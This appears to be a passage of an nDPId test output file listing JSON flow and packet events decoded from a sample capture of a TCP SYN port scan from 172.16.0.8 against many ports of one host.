-00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":776,"source":"synscan.pcap","alias":"nDPId-test","flow_id":767,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059676,"flow_last_seen":1278275059676,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059676,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49163,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":776,"source":"synscan.pcap","alias":"nDPId-test","flow_id":767,"flow_packet_id":1,"flow_last_seen":1278275059676,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059676,"pkt":"ACYLMQczACWzv5HuCABFAAAsarwAADIGq7asEAAIQA2GNIzSwAvdUoMYAAAAAGACDABsgwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":777,"source":"synscan.pcap","alias":"nDPId-test","flow_id":768,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059676,"flow_last_seen":1278275059676,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059676,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1085,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":777,"source":"synscan.pcap","alias":"nDPId-test","flow_id":768,"flow_packet_id":1,"flow_last_seen":1278275059676,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059676,"pkt":"ACYLMQczACWzv5HuCABFAAAswXIAAC4GWQCsEAAIQA2GNIzSBD3dUoMYAAAAAGACDAAoUgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":778,"source":"synscan.pcap","alias":"nDPId-test","flow_id":769,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059676,"flow_last_seen":1278275059676,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059676,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5922,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":778,"source":"synscan.pcap","alias":"nDPId-test","flow_id":769,"flow_packet_id":1,"flow_last_seen":1278275059676,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059676,"pkt":"ACYLMQczACWzv5HuCABFAAAsAosAADQGEeisEAAIQA2GNIzSFyLdUoMYAAAAAGACBAAdbQAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":779,"source":"synscan.pcap","alias":"nDPId-test","flow_id":770,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059676,"flow_last_seen":1278275059676,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059676,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32782,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":779,"source":"synscan.pcap","alias":"nDPId-test","flow_id":770,"flow_packet_id":1,"flow_last_seen":1278275059676,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059676,"pkt":"ACYLMQczACWzv5HuCABFAAAs0jUAADUGQT2sEAAIQA2GNIzSgA7dUoMYAAAAAGACCACwgAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":780,"source":"synscan.pcap","alias":"nDPId-test","flow_id":771,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059676,"flow_last_seen":1278275059676,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059676,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1079,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":780,"source":"synscan.pcap","alias":"nDPId-test","flow_id":771,"flow_packet_id":1,"flow_last_seen":1278275059676,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059676,"pkt":"ACYLMQczACWzv5HuCABFAAAs6oMAACkGNO+sEAAIQA2GNIzSBDfdUoMYAAAAAGACCAAsWAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":781,"source":"synscan.pcap","alias":"nDPId-test","flow_id":772,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059676,"flow_last_seen":1278275059676,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059676,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1141,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":781,"source":"synscan.pcap","alias":"nDPId-test","flow_id":772,"flow_packet_id":1,"flow_last_seen":1278275059676,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059676,"pkt":"ACYLMQczACWzv5HuCABFAAAs78YAACwGLKysEAAIQA2GNIzSBHXdUoMYAAAAAGACBAAwGgAAAgQFtA=="} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":782,"source":"synscan.pcap","alias":"nDPId-test","flow_id":773,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059676,"flow_last_seen":1278275059676,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059676,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":617,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":782,"source":"synscan.pcap","alias":"nDPId-test","flow_id":773,"flow_packet_id":1,"flow_last_seen":1278275059676,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059676,"pkt":"ACYLMQczACWzv5HuCABFAAAs9GgAACkGKwqsEAAIQA2GNIzSAmndUoMYAAAAAGACCAAuJgAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":783,"source":"synscan.pcap","alias":"nDPId-test","flow_id":774,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059735,"flow_last_seen":1278275059735,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059735,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10617,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":783,"source":"synscan.pcap","alias":"nDPId-test","flow_id":774,"flow_packet_id":1,"flow_last_seen":1278275059735,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059735,"pkt":"ACYLMQczACWzv5HuCABFAAAsJhYAADUG7VysEAAIQA2GNIzTKXndU4MZAAAAAGACCAAHEwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":784,"source":"synscan.pcap","alias":"nDPId-test","flow_id":775,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059735,"flow_last_seen":1278275059735,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059735,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2107,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":784,"source":"synscan.pcap","alias":"nDPId-test","flow_id":775,"flow_packet_id":1,"flow_last_seen":1278275059735,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059735,"pkt":"ACYLMQczACWzv5HuCABFAAAsDq4AACcGEsWsEAAIQA2GNIzTCDvdU4MZAAAAAGACEAAgUQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":785,"source":"synscan.pcap","alias":"nDPId-test","flow_id":776,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059735,"flow_last_seen":1278275059735,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059735,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9943,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":785,"source":"synscan.pcap","alias":"nDPId-test","flow_id":776,"flow_packet_id":1,"flow_last_seen":1278275059735,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059735,"pkt":"ACYLMQczACWzv5HuCABFAAAsKtQAACwG8Z6sEAAIQA2GNIzTJtfdU4MZAAAAAGACBAANtQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":786,"source":"synscan.pcap","alias":"nDPId-test","flow_id":777,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059735,"flow_last_seen":1278275059735,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059735,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1839,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":786,"source":"synscan.pcap","alias":"nDPId-test","flow_id":777,"flow_packet_id":1,"flow_last_seen":1278275059735,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059735,"pkt":"ACYLMQczACWzv5HuCABFAAAsiiIAADcGh1CsEAAIQA2GNIzTBy\/dU4MZAAAAAGACEAAhXQAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":787,"source":"synscan.pcap","alias":"nDPId-test","flow_id":778,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059735,"flow_last_seen":1278275059735,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059735,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49165,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":787,"source":"synscan.pcap","alias":"nDPId-test","flow_id":778,"flow_packet_id":1,"flow_last_seen":1278275059735,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059735,"pkt":"ACYLMQczACWzv5HuCABFAAAsuHAAADUGWwKsEAAIQA2GNIzTwA3dU4MZAAAAAGACCABwfgAAAgQFtA=="} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":788,"source":"synscan.pcap","alias":"nDPId-test","flow_id":779,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059735,"flow_last_seen":1278275059735,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059735,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":366,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":788,"source":"synscan.pcap","alias":"nDPId-test","flow_id":779,"flow_packet_id":1,"flow_last_seen":1278275059735,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059735,"pkt":"ACYLMQczACWzv5HuCABFAAAsABEAADIGFmKsEAAIQA2GNIzTAW7dU4MZAAAAAGACDAArHgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":789,"source":"synscan.pcap","alias":"nDPId-test","flow_id":780,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059735,"flow_last_seen":1278275059735,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059735,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1148,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":789,"source":"synscan.pcap","alias":"nDPId-test","flow_id":780,"flow_packet_id":1,"flow_last_seen":1278275059735,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059735,"pkt":"ACYLMQczACWzv5HuCABFAAAs+lUAADMGGx2sEAAIQA2GNIzTBHzdU4MZAAAAAGACEAAkEAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":790,"source":"synscan.pcap","alias":"nDPId-test","flow_id":781,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059735,"flow_last_seen":1278275059735,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059735,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1658,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":790,"source":"synscan.pcap","alias":"nDPId-test","flow_id":781,"flow_packet_id":1,"flow_last_seen":1278275059735,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059735,"pkt":"ACYLMQczACWzv5HuCABFAAAsym4AAC8GTwSsEAAIQA2GNIzTBnrdU4MZAAAAAGACEAAiEgAAAgQFtA=="} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":791,"source":"synscan.pcap","alias":"nDPId-test","flow_id":782,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059735,"flow_last_seen":1278275059735,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059735,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":125,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":791,"source":"synscan.pcap","alias":"nDPId-test","flow_id":782,"flow_packet_id":1,"flow_last_seen":1278275059735,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059735,"pkt":"ACYLMQczACWzv5HuCABFAAAs0wAAAC8GRnKsEAAIQA2GNIzTAH3dU4MZAAAAAGACEAAoDwAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":792,"source":"synscan.pcap","alias":"nDPId-test","flow_id":783,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059735,"flow_last_seen":1278275059735,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059735,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":16000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":792,"source":"synscan.pcap","alias":"nDPId-test","flow_id":783,"flow_packet_id":1,"flow_last_seen":1278275059735,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059735,"pkt":"ACYLMQczACWzv5HuCABFAAAsU2gAADoGuwqsEAAIQA2GNIzTPoDdU4MZAAAAAGACDADuCwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":793,"source":"synscan.pcap","alias":"nDPId-test","flow_id":784,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059735,"flow_last_seen":1278275059735,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059735,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1718,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":793,"source":"synscan.pcap","alias":"nDPId-test","flow_id":784,"flow_packet_id":1,"flow_last_seen":1278275059735,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059735,"pkt":"ACYLMQczACWzv5HuCABFAAAspR0AACYGfVWsEAAIQA2GNIzTBrbdU4MZAAAAAGACDAAl1gAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":794,"source":"synscan.pcap","alias":"nDPId-test","flow_id":785,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059736,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10778,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":794,"source":"synscan.pcap","alias":"nDPId-test","flow_id":785,"flow_packet_id":1,"flow_last_seen":1278275059736,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059736,"pkt":"ACYLMQczACWzv5HuCABFAAAsaGIAADEGrxCsEAAIQA2GNIzTKhrdU4MZAAAAAGACCAAGcgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":795,"source":"synscan.pcap","alias":"nDPId-test","flow_id":786,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059736,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1721,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":795,"source":"synscan.pcap","alias":"nDPId-test","flow_id":786,"flow_packet_id":1,"flow_last_seen":1278275059736,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059736,"pkt":"ACYLMQczACWzv5HuCABFAAAsf0wAADAGmSasEAAIQA2GNIzTBrndU4MZAAAAAGACBAAt0wAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":796,"source":"synscan.pcap","alias":"nDPId-test","flow_id":787,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059736,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1199,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":796,"source":"synscan.pcap","alias":"nDPId-test","flow_id":787,"flow_packet_id":1,"flow_last_seen":1278275059736,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059736,"pkt":"ACYLMQczACWzv5HuCABFAAAs3P8AAC4GPXOsEAAIQA2GNIzTBK\/dU4MZAAAAAGACDAAn3QAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":797,"source":"synscan.pcap","alias":"nDPId-test","flow_id":788,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059736,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1875,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":797,"source":"synscan.pcap","alias":"nDPId-test","flow_id":788,"flow_packet_id":1,"flow_last_seen":1278275059736,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059736,"pkt":"ACYLMQczACWzv5HuCABFAAAstBMAACsGaV+sEAAIQA2GNIzTB1PdU4MZAAAAAGACEAAhOQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":798,"source":"synscan.pcap","alias":"nDPId-test","flow_id":789,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059736,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3390,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":798,"source":"synscan.pcap","alias":"nDPId-test","flow_id":789,"flow_packet_id":1,"flow_last_seen":1278275059736,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059736,"pkt":"ACYLMQczACWzv5HuCABFAAAsMAEAADUG43GsEAAIQA2GNIzTDT7dU4MZAAAAAGACCAAjTgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":799,"source":"synscan.pcap","alias":"nDPId-test","flow_id":790,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059736,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8701,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":799,"source":"synscan.pcap","alias":"nDPId-test","flow_id":790,"flow_packet_id":1,"flow_last_seen":1278275059736,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059736,"pkt":"ACYLMQczACWzv5HuCABFAAAsRyIAAC0G1FCsEAAIQA2GNIzTIf3dU4MZAAAAAGACCAAOjwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":800,"source":"synscan.pcap","alias":"nDPId-test","flow_id":791,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059736,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1083,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 